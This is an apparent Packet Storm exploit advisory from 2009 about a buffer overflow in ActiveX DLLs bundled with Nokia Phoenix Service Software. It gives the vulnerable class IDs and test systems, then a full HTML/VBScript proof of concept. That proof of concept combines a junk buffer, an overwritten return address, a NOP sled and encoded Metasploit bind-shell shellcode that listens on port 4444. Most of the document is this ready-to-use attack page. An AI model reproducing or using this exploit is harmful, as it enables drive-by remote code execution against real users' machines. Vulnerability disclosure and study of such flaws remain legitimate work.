Nokia Phoenix Buffer Overflow

2009-02-09T00:00:00
ID PACKETSTORM:74769
Type packetstorm
Reporter MurderSkillz
Modified 2009-02-09T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------------------------------------------  
BOF discovered and written by MurderSkillz  
------------------------------------------------------------------------------------------------------------  
Description:  
Company Name and Website  
Nokia  
www.Nokia.com  
  
Software that comes with the Vulnerable .dll's:  
Nokia Phoenix Service Software 2008.04.007.32837   
  
This software is used for flashing nokia cellphones and maintenance.  
Other versions of this software were not tested but may be vulnerable if the dll versions are the same as other Phoenix versions..  
  
Vulnerable dll's: cmnsignalanalyzerfn.dll {F85B4A10-B530-4D68-A714-7415838FD174}  
& cmnsignalgeneratorfn.dll {929A0D77-044A-497F-8FDF-8EDE81F6251A}  
Both file Versions are: 1.0.0.0  
  
RegKey Safe for Script: False  
RegkeySafe for Init: False  
KillBitSet: False  
  
The POC was tested on Windows XP Pro SP3 w/ Internet Explorer 7 - All patched  
Also Windows XP Pro SP2 w/ Internet Explorer 7  
  
By the way, props go out to shinnai for his tool, Roadmap.  
Major thanks go out to HD Moore and the Metasploit project/crew =) www.metasploit.com  
Thanks sCORPINo =P www.snoop-security.com  
  
The author of this POC is not responsible for any stupid shit you do with it =)  
------------------------------------------------------------------------------------------------------------  
<html>  
<object classid='clsid:F85B4A10-B530-4D68-A714-7415838FD174' id='Fucker'></object>  
<script language = 'vbscript'>  
junk = String(370, "A")  
  
EIP = unescape("%53%49%48%7E") 'call esp from user32.dll XpPro Sp3/IE7  
  
nop = String(12, unescape("%90"))  
  
<!-- win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com -->  
  
shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49")  
shellcode=shellcode+unescape("%49%49%37%49%49%49%49%49%49%49%49%49%51%5a%6a%67")  
shellcode=shellcode+unescape("%58%30%42%31%50%41%42%6b%42%41%77%32%42%42%32%41")  
shellcode=shellcode+unescape("%41%30%41%41%42%58%38%42%42%50%75%6b%59%39%6c%50")  
shellcode=shellcode+unescape("%6a%7a%4b%70%4d%6d%38%4b%49%6b%4f%59%6f%69%6f%31")  
shellcode=shellcode+unescape("%70%4e%6b%72%4c%51%34%56%44%4e%6b%30%45%57%4c%4c")  
shellcode=shellcode+unescape("%4b%33%4c%57%75%53%48%45%51%68%6f%6e%6b%32%6f%52")  
shellcode=shellcode+unescape("%38%4e%6b%53%6f%61%30%45%51%5a%4b%42%69%4e%6b%56")  
shellcode=shellcode+unescape("%54%4e%6b%47%71%78%6e%45%61%4b%70%6f%69%4c%6c%6d")  
shellcode=shellcode+unescape("%54%6f%30%71%64%65%57%58%41%68%4a%76%6d%35%51%6b")  
shellcode=shellcode+unescape("%72%78%6b%6c%34%75%6b%73%64%75%74%75%78%51%65%49")  
shellcode=shellcode+unescape("%75%6e%6b%51%4f%36%44%57%71%5a%4b%70%66%6e%6b%34")  
shellcode=shellcode+unescape("%4c%30%4b%6c%4b%73%6f%47%6c%65%51%4a%4b%73%33%64")  
shellcode=shellcode+unescape("%6c%4e%6b%4b%39%70%6c%31%34%77%6c%75%31%69%53%65")  
shellcode=shellcode+unescape("%61%49%4b%52%44%6e%6b%32%63%36%50%6e%6b%33%70%74")  
shellcode=shellcode+unescape("%4c%6c%4b%74%30%45%4c%4c%6d%6e%6b%77%30%57%78%61")  
shellcode=shellcode+unescape("%4e%73%58%6c%4e%50%4e%36%6e%38%6c%56%30%79%6f%38")  
shellcode=shellcode+unescape("%56%55%36%72%73%65%36%30%68%44%73%34%72%65%38%42")  
shellcode=shellcode+unescape("%57%53%43%77%42%61%4f%31%44%6b%4f%6e%30%45%38%4a")  
shellcode=shellcode+unescape("%6b%48%6d%4b%4c%77%4b%46%30%69%6f%4a%76%61%4f%4b")  
shellcode=shellcode+unescape("%39%6b%55%62%46%4b%31%48%6d%75%58%76%62%43%65%73")  
shellcode=shellcode+unescape("%5a%35%52%6b%4f%4e%30%55%38%6e%39%65%59%6b%45%6e")  
shellcode=shellcode+unescape("%4d%62%77%4b%4f%69%46%51%43%46%33%71%43%52%73%63")  
shellcode=shellcode+unescape("%63%43%73%30%53%70%43%61%43%59%6f%6e%30%72%46%75")  
shellcode=shellcode+unescape("%38%52%31%71%4c%33%56%43%63%6d%59%59%71%6c%55%72")  
shellcode=shellcode+unescape("%48%6f%54%66%7a%70%70%4b%77%50%57%4b%4f%4b%66%63")  
shellcode=shellcode+unescape("%5a%36%70%71%41%50%55%4b%4f%4e%30%61%78%4f%54%4c")  
shellcode=shellcode+unescape("%6d%56%4e%69%79%52%77%6b%4f%5a%76%36%33%43%65%59")  
shellcode=shellcode+unescape("%6f%5a%70%45%38%6a%45%30%49%6c%46%57%39%72%77%59")  
shellcode=shellcode+unescape("%6f%7a%76%50%50%71%44%70%54%52%75%39%6f%58%50%6e")  
shellcode=shellcode+unescape("%73%42%48%4b%57%71%69%38%46%33%49%41%47%39%6f%49")  
shellcode=shellcode+unescape("%46%30%55%49%6f%4a%70%50%66%61%7a%31%74%43%56%52")  
shellcode=shellcode+unescape("%48%75%33%62%4d%6c%49%49%75%71%7a%42%70%50%59%54")  
shellcode=shellcode+unescape("%69%4a%6c%4c%49%39%77%42%4a%57%34%4b%39%69%72%65")  
shellcode=shellcode+unescape("%61%4b%70%58%73%6d%7a%6b%4e%50%42%76%4d%6b%4e%50")  
shellcode=shellcode+unescape("%42%76%4c%4d%43%6e%6d%73%4a%65%68%6e%4b%6e%4b%4c")  
shellcode=shellcode+unescape("%6b%71%78%32%52%6b%4e%4f%43%34%56%69%6f%72%55%32")  
shellcode=shellcode+unescape("%64%49%6f%7a%76%43%6b%56%37%56%32%70%51%30%51%32")  
shellcode=shellcode+unescape("%71%43%5a%37%71%41%41%73%61%63%65%66%31%4b%4f%5a")  
shellcode=shellcode+unescape("%70%70%68%6e%4d%79%49%73%35%5a%6e%61%43%49%6f%58")  
shellcode=shellcode+unescape("%56%50%6a%49%6f%59%6f%64%77%59%6f%58%50%4c%4b%32")  
shellcode=shellcode+unescape("%77%6b%4c%4e%63%48%44%63%54%6b%4f%4e%36%46%32%69")  
shellcode=shellcode+unescape("%6f%38%50%51%78%78%70%4f%7a%76%64%31%4f%63%63%69")  
shellcode=shellcode+unescape("%6f%4b%66%6b%4f%68%50%67")  
  
NokiaFucker = junk + EIP + nop + shellcode  
  
Fucker.SelectDevice NokiaFucker,""  
</script>  
</html>`